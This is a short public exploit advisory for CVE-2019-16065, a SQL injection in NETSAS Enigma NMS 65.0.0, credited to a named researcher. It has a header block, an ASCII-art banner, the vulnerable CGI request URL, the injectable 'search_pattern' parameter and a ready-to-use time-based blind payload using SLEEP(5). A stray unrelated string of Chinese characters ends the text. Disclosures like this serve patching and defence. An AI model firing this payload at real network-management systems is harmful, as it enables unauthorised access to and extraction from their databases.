#--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date:21 July 2019# # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage:https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/# # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16065# # Full write-up: https://www.mogozobo.com/?p=3647# #--------------------------------------------------------------------# __ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/-= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter:search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
体验盒子